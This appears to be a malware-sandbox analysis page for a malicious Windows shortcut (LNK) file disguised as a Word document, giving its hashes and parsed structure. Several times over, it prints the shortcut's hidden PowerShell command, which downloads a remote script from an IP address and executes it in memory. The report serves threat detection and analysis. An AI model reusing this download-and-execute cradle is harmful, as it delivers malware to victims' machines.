Malicious

4999efed7397536355c5d353283240c8

LNK File
|
MD5: 4999efed7397536355c5d353283240c8
|
Size: 6.11 KB
|
application/x-ms-shortcut

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	4999efed7397536355c5d353283240c8
Sha1	335b5653c41ded701fdde74651a15e120094dcd4
Sha256	bee1f85acc47382c2ed67c7bb636dff411965e5bdb0e105f44469f3bf05fa812
Sha384	87dedf46621de8382e4cdec40f5f78f77fb077355f7e05b6af062db68f90a32c40ab8df4ed394a8a109ea482eb3270a2
Sha512	40cb91ae7381122e53ad7451c4620e80649139736636a5f34879293c5479d664546b3fb20268adb89058df762fe269796894966f766fe30fa83bbcd1be1eba61
SSDeep	12:8d/MkEkEkTs0olPfVUlmv4SlPo6qs8XleAsni7X/ir+eXqlhM6VenpwKKblu+ssN:8d/MxxLPfOAPfq1tii7vHe6rUgsnP
TLSH	4FC15C9076F44B48E0B25F39B5767791C865BE24DE31CB8C2314944E0CB1791E8E5F6E

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://195.10.205.65/datemed/slappicnic.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText))
Deobfuscated PowerShell	-w "Hidden" $r "=" "New-Object" -ComObject "WinHttp.WinHttpRequest.5.1" $r."Open"("GET", "http://195.10.205.65/datemed/slappicnic.ps1", $false) $r."SetRequestHeader"("User-Agent", "UA WindowsPowerShell") $r."Send"() . ([ScriptBlock]::"Create"($r."ResponseText"))
Deobfuscated PowerShell	shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "2/17/2026" "3:23:05" "PM" accesstime: "2/17/2026" "3:23:05" "PM" writetime: "2/17/2026" "3:23:05" "PM" filesize: 0 0 iconindex: 97 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "MS" "W??rd" "Docum??nt" workingdir: "%APPDATA%" commandlinearguments: -w "Hidden" $r "=" "New-Object" -ComObject "WinHttp.WinHttpRequest.5.1" $r."Open"("GET", "http://195.10.205.65/datemed/slappicnic.ps1", $false) $r."SetRequestHeader"("User-Agent", "UA WindowsPowerShell") $r."Send"() . ([ScriptBlock]::"Create"($r."ResponseText")) iconlocation: "imageres.dll"

4999efed7397536355c5d353283240c8 (6.11 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://195.10.205.65/datemed/slappicnic.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText)) Malicious	4999efed7397536355c5d353283240c8
Deobfuscated PowerShell	-w "Hidden" $r "=" "New-Object" -ComObject "WinHttp.WinHttpRequest.5.1" $r."Open"("GET", "http://195.10.205.65/datemed/slappicnic.ps1", $false) $r."SetRequestHeader"("User-Agent", "UA WindowsPowerShell") $r."Send"() . ([ScriptBlock]::"Create"($r."ResponseText")) Malicious	4999efed7397536355c5d353283240c8 > LNK CommandLine
Deobfuscated PowerShell	shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "2/17/2026" "3:23:05" "PM" accesstime: "2/17/2026" "3:23:05" "PM" writetime: "2/17/2026" "3:23:05" "PM" filesize: 0 0 iconindex: 97 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "MS" "W??rd" "Docum??nt" workingdir: "%APPDATA%" commandlinearguments: -w "Hidden" $r "=" "New-Object" -ComObject "WinHttp.WinHttpRequest.5.1" $r."Open"("GET", "http://195.10.205.65/datemed/slappicnic.ps1", $false) $r."SetRequestHeader"("User-Agent", "UA WindowsPowerShell") $r."Send"() . ([ScriptBlock]::"Create"($r."ResponseText")) iconlocation: "imageres.dll" Malicious	4999efed7397536355c5d353283240c8 > [Lnk Summary]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙